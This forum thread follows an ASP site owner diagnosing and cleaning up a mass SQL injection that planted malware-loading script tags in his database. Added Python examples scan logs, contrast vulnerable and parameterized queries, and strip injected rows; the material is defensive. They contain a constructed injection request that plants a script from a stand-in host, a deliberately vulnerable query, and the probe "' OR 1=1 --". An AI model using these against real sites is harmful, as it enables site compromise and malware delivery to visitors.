
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 541

Hacked website or something else?

I have a website that is ASP based.
As of yesterday, when someone goes on to the site and does a query (looks up information), the site starts to do some sort of redirection and tries to load a virus on the client PC.

I took the site offline, formatted the server, reloaded Windows 2003.

I restored a copy of the site from a week ago, prior to anything going on.
The server is patched 100% and AV is installed.

I put the site back up and went to the page and bam, same issue.  I am stumped.

We have a Windows 2003 server behind a Cisco firewall and an MS SQL server that the website talks to.  Any ideas how I can get ahead of this?

thanks
Asked: lefty431

3 Solutions
 
debuggerauCommented:
How do you know it's a SQL injection hack? Usually the SQL backend is not web accessible...

Has the server been hardened?
Best practices on IIS?

Complex non human passwords?
Limited accounts?

>20 Char admin password?

Have you got an infected backup that can be checked?
 
lefty431Author Commented:
Yes to all of your questions.
15 char admin password, not 20.  It could be a cross hack too, which in reading it sounds more like the case.   How do you get rid of it?
 
Dozer42Commented:
Yep, it's been hacked.

Compare the source code or at least filesizes of the web page that you originally uploaded to the server with what is there now. Find the infection and kill it. (Or check it against archives, you do have backups, right?)

When you say 'AV is installed', I'm guessing you're talking about one of the worthless mass market products like Norton, McAfee, etc.

Try something a bit more powerful like ESET's NOD32 or Kaspersky.

But even they might have trouble finding a virus directly embedded into ASP code, as it's not an 'everyday' infection. At least they do have 'intelligent' heuristic scanning engines that could pick the virus up even if it's unknown or a variant of some other virus.

If those two programs can't find the infection, feel free to send those companies a copy of your website directory structure and files, and have them comb through it manually.

These guys are good. Very good, and they will find it.

Or just toss this Microsoft garbage in the trash where it belongs and run a secure Linux variant. =)

We've been running Linux on our servers for 15 years now. Never had a server hacked, never had a page compromised except for spammers using an insecure Forms.Pl script that someone uploaded and used on their webpage.

Good luck sir.

You will beat this.
 
r-kCommented:
Good advice from Dozer42, but I don't think you need to do anything so drastic as switching platforms to solve this problem...

From the description it seems like your backup may also be infected, so I would start with restoring an even older backup.

I posted some other tips in your other thread that seems to be on the same topic:

 http://www.experts-exchange.com/Software/Server_Software/Web_Servers/Microsoft_IIS/Q_23478167.html

Good luck.
 
jahboiteCommented:
If it were SQL injection, then the HTML that performs the redirections/loads the iframe will be in the SQL database; your ASP code will be unaffected.
Maybe you should check there.
 
lefty431Author Commented:
Where in SQL?  Any ideas?
 
lefty431Author Commented:
Dude, you're a genius.
 
r-kCommented:
That's great. Were you able to find the problem?
 
lefty431Author Commented:
I found the database table that had all of the bad code.  I don't know what to look for in the ASP that would show the hole or how they got the exploit...

Any ideas on that?
 
jahboiteCommented:
Recent SQL injection against MS SQL involves sending a query that contains statements to determine fields in tables that can have text appended to them and to append a string to those fields for all rows.  You may find <iframe> tags in these fields.
An example of HTTP request parameters to perform the attack can be found here:
http://www.sophos.com/security/blog/2008/04/1329.html?_log_from=rss
http://www.secureworks.com/research/blog/index.php/2008/06/04/new-round-of-mass-sql-injections/
http://www.secureworks.com/research/threats/danmecasprox/?threat=danmecasprox

and as you can see, the request includes DECLARE and CAST statements which might help you to find both entries in your web access logs and in your SQL transactions.

Shadowserver has a list of domains used for hosting the malware which might also help you find stuff in your tables (this list is a bit old now, but it's probably worth a look):
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514

A lot of other people who use EE have had problems with SQL injections and it's worth searching for some of the questions for more information on how to prevent the attacks:
http://www.experts-exchange.com/Security/Vulnerabilities/Q_23411125.html
http://www.experts-exchange.com/Microsoft/Development/MS-SQL-Server/Q_23422326.html
http://www.experts-exchange.com/Microsoft/Development/MS-SQL-Server/Q_23427846.html
http://www.experts-exchange.com/Security/Misc/Q_23391099.html
http://www.experts-exchange.com/Security/Vulnerabilities/Q_23381980.html

This little lot should at least help you to identify whether this is indeed what happened to you and what you can do about it if it was.
Good Luck!

 
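jahboite's point that the DECLARE and CAST statements are what to look for in the web access logs can be turned into a small triage script. The following is an added example written for this thread, not code from any of the posters or from the linked blogs. It assumes a simplified IIS W3C field order (date, time, client IP, method, URI stem, query string, status) and uses a constructed log line whose CAST(0x...) block is built from a harmless placeholder string; the hostname example.invalid is a placeholder too. The decoder handles both VARCHAR (single-byte) and NVARCHAR (UTF-16LE) hex payloads, which the thread's links mention only in passing.

```python
import re
from urllib.parse import unquote_plus

# Markers of the mass-injection request described in the thread: a stacked
# DECLARE/SET/EXEC whose real statement hides inside CAST(0x... AS VARCHAR).
INJECTION_MARKERS = re.compile(
    r"declare\s+@\w+|cast\s*\(\s*0x[0-9a-f]+|exec\s*\(\s*@\w+\s*\)", re.I
)
CAST_HEX = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)", re.I)

# Constructed stand-in for the hidden statement; real payloads are far longer.
_SAMPLE_DECODED = (
    "UPDATE placeholder SET col=col+"
    "'<script src=\"http://example.invalid/1.js\"></script>'"
)
_SAMPLE_HEX = _SAMPLE_DECODED.encode("ascii").hex().upper()

# Constructed sample log: one normal search and one injection attempt.
SAMPLE_LOG_LINES = [
    "2008-06-10 12:00:01 10.0.0.5 GET /search.asp q=widgets 200",
    "2008-06-10 12:00:02 203.0.113.7 GET /search.asp "
    f"q=1;DECLARE+@S+VARCHAR(4000);SET+@S=CAST(0x{_SAMPLE_HEX}"
    "+AS+VARCHAR(4000));EXEC(@S);-- 200",
]


def decode_cast_hex(hex_str: str) -> str:
    """Turn the hex literal inside CAST(0x...) back into the SQL it hides.

    VARCHAR payloads are single-byte text; NVARCHAR payloads are UTF-16LE,
    which shows up as a NUL after (almost) every byte of ASCII.
    """
    raw = bytes.fromhex(hex_str)
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def scan_log_line(line: str):
    """Return a finding for one log line, or None if it looks clean.

    Assumed (constructed) field order:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
    """
    if line.startswith("#"):  # W3C header lines
        return None
    parts = line.split()
    if len(parts) < 7:
        return None
    date, time, client_ip, method, stem, query, status = parts[:7]
    decoded_query = unquote_plus(query)  # the payload arrives URL-encoded
    if not INJECTION_MARKERS.search(decoded_query):
        return None
    hidden_sql = [decode_cast_hex(h) for h in CAST_HEX.findall(decoded_query)]
    return {
        "when": f"{date} {time}",
        "client_ip": client_ip,
        "method": method,
        "uri": f"{stem}?{query}",
        "status": status,
        "hidden_sql": hidden_sql,
        # True when the decoded statement plants a script tag, as in the thread
        "drops_script_tag": any("<script" in s.lower() for s in hidden_sql),
    }


def scan_log(lines):
    """All findings for an iterable of log lines."""
    return [f for f in (scan_log_line(line) for line in lines) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG_LINES):
        print(finding["when"], finding["client_ip"], finding["uri"][:60], "...")
        for sql in finding["hidden_sql"]:
            print("  hidden SQL:", sql)
```

Run it over the real log files instead of SAMPLE_LOG_LINES to get the client IPs, timestamps and the exact pages (URI stems) that accepted the payload; those stems are the ASP pages whose input handling needs fixing, and the decoded statement tells you which script source to hunt for in the tables.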
jahboiteCommented:
Bit of a lag there! Glad you found the table.
You're looking for asp code that takes input from the client (forms with POST or GET methods) or takes input from the HTTP request parameters (usually the GET method).  It then uses the input in forming a SQL statement.
Tolomir pointed to some info on how to prevent SQL injection in this post:
http://www.experts-exchange.com/Security/Vulnerabilities/Q_23411125.html
One of the links was this very handy article:
http://msdn.microsoft.com/en-us/library/ms998271.aspx
and you might be interested in URLscan:
http://technet.microsoft.com/en-gb/security/cc242650.aspx
 
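jahboite describes the code to look for as anything that takes client input and "uses the input in forming a SQL statement". The thread's site is classic ASP talking to MS SQL through ADO; the example below is an added illustration (not code from the thread or from the linked MSDN article) that uses Python and an in-memory SQLite table as a stand-in to show the same distinction: a query built by string concatenation beside its parameterized form. The products table and its rows are constructed sample data.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample: a tiny catalogue standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, public INTEGER);
        INSERT INTO products VALUES (1, 'Widget', 1);
        INSERT INTO products VALUES (2, 'Gadget', 1);
        INSERT INTO products VALUES (3, 'Unreleased prototype', 0);
    """)
    return conn


def search_vulnerable(conn, term: str):
    """The pattern to look for in the ASP: request input pasted into the SQL text.

    Whatever the client sends becomes part of the statement, so quotes and
    comment markers in `term` change what the query means instead of being
    compared as data.
    """
    sql = "SELECT name FROM products WHERE public = 1 AND name LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, term: str):
    """Hardened form: the SQL text is fixed and the input travels as a bound
    parameter (ADODB.Command with Parameters in classic ASP plays the same role)."""
    sql = "SELECT name FROM products WHERE public = 1 AND name LIKE '%' || ? || '%'"
    return [row[0] for row in conn.execute(sql, (term,))]


if __name__ == "__main__":
    db = build_db()
    # Ordinary input behaves the same either way.
    print(search_vulnerable(db, "Wid"), search_parameterized(db, "Wid"))
    # Input carrying a quote and a comment marker rewrites the concatenated
    # query's WHERE clause (the public = 1 filter is lost) but is harmless
    # when bound as a parameter.
    odd = "' OR 1=1 --"
    print(search_vulnerable(db, odd), search_parameterized(db, odd))
```

When auditing the site's .asp files, grep for Request.Form, Request.QueryString and Request("...") and follow each value to see whether it lands inside a string that is later passed to Execute or Open; every such place is a candidate for the parameterized form.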
lefty431Author Commented:
This is from the website:
Malicious SQL injection

We have blogged a few times recently about a fairly widespread and aggressive attack used to compromise web pages by inserting a malicious script tag (which loads a malicious script from a remote site) [1,2,3]. Aside from the usual plethora of small site victims, the attack has had notable success against several quite well known targets.

Last week, some interesting information was posted to the SANS Handlers Diary [4]. Whilst investigating some malicious files, the tool used by the attackers to identify and attack vulnerable web servers was found. The tool provides a simple interface in order to perform SQL injection attacks against sites identified via a Google query.

This morning, I was investigating another attack that is most likely related. The target of the malicious script tag has changed, but the underlying malicious SQL is very similar. The malicious injection can be seen below:

[Dump of the malicious SQL injection]

As you can see, the main guts of the malicious SQL (within @S) are obfuscated within the CAST(0x&) block (which is trimmed for clarity). Decryption is trivial, enabling us to identify how the attack works.

[Decrypted SQL]

In brief, the SQL will concatenate a malicious script tag into all (n)text and (n)varchar fields of all user tables in the MS SQL database. Nasty. Particularly for webmasters who have been hit, leaving them with a cumbersome cleanup process, and the challenge of preventing the same attack hitting them again.

And the purpose of the attack? Feeding the 1.js file into our automation system, we see a whole mass of pages that will get loaded as a result of browsing a compromised page. This is represented in the flowchart below (click to enlarge):

    * yellow blob: malicious 1.js file loaded from compromised pages
    * green arrows: page loads via an iframe (or similar)
    * red arrows: exploit payload, in this case resulting in the download of some Win32 malware


This clearly looks like the issue...  What do you think I should search for on the web pages?

I am not a web programmer, but I can hash through the code.
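The quoted Sophos write-up says the injected SQL appends a script tag to every text field of every user table, which is exactly why a single table cleanup is not enough. The following is an added example, not code from the thread or from Sophos, that walks the database catalogue to find every text column, reports each row carrying a remote-script tag, and strips it. It uses an in-memory SQLite database with constructed sample rows as a stand-in; on MS SQL the same walk would read table and column names from INFORMATION_SCHEMA.COLUMNS instead of sqlite_master and PRAGMA table_info. The tag pattern is kept narrow on purpose and should be tightened to the exact script source seen in your own tables or logs before anything is updated.

```python
import re
import sqlite3

# The shape described in the thread: a remote script tag appended to text.
INJECTED_TAG = re.compile(r'<script\s+src=["\'][^"\']+["\']\s*>\s*</script>', re.I)


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample: two user tables, one row in each tampered with."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT,
                               description TEXT, price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A fine widget', 9.99);
        INSERT INTO products VALUES (2, 'Gadget',
            'A gadget<script src="http://example.invalid/1.js"></script>', 19.99);
        INSERT INTO news VALUES (1,
            'Hello<script src="http://example.invalid/1.js"></script>', 'Body text');
    """)
    return conn


def text_columns(conn):
    """Every (table, column) pair holding text, read from the catalogue.

    Identifiers come from the catalogue, never from user input, so quoting
    them into the statements below is safe.
    """
    cols = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        for _cid, name, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if "CHAR" in ctype.upper() or "TEXT" in ctype.upper():
                cols.append((table, name))
    return cols


def find_injected(conn):
    """Rows whose text fields carry the tag, as (table, column, rowid, value)."""
    hits = []
    for table, col in text_columns(conn):
        for rowid, value in conn.execute(f'SELECT rowid, "{col}" FROM "{table}"'):
            if isinstance(value, str) and INJECTED_TAG.search(value):
                hits.append((table, col, rowid, value))
    return hits


def clean_injected(conn) -> int:
    """Strip the tag from every hit, row by row, and return how many rows changed."""
    fixed = 0
    for table, col, rowid, value in find_injected(conn):
        cleaned = INJECTED_TAG.sub("", value)
        conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
                     (cleaned, rowid))
        fixed += 1
    conn.commit()
    return fixed


if __name__ == "__main__":
    db = build_sample_db()
    for table, col, rowid, value in find_injected(db):
        print(f"{table}.{col} row {rowid}: {value!r}")
    print("rows cleaned:", clean_injected(db))
```

Take a backup first and review the list from find_injected before running clean_injected; the report is also the evidence you need to compare against the access logs, since a compromised row that predates the oldest clean backup tells you how long the hole has been open.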